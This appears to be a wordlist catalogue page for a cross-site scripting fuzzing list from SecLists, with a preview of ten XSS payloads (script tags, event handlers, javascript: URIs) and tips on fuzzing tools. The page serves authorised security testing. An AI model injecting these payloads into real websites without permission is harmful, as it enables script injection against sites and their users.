Skip to content
Fuzzing110 lines (19 KB)

XSS Payloads (Jhaddix)

Jhaddix's robot-friendly cross-site scripting payload collection covering script tags, event handlers, and filter-bypass vectors. Inject into reflected parameters to fuzz for XSS.

View source
Size
110 lines (19 KB)
Category
Fuzzing
Source
danielmiessler/SecLists
License
MIT
Recommended tools
ffufwfuzz

Preview

First 10 entries. Download or copy the full list (110 lines (19 KB)) using the buttons above.

>head xss-jhaddix.txt110 lines (19 KB)
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)
' onmouseover=alert(1) '
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
<a href=javascript:alert(1)>x</a>

Jhaddix's robot-friendly cross-site scripting payload collection covering script tags, event handlers, and filter-bypass vectors. Inject into reflected parameters to fuzz for XSS.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 110 lines (19 KB) and pairs well with tools such as ffuf, wfuzz. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.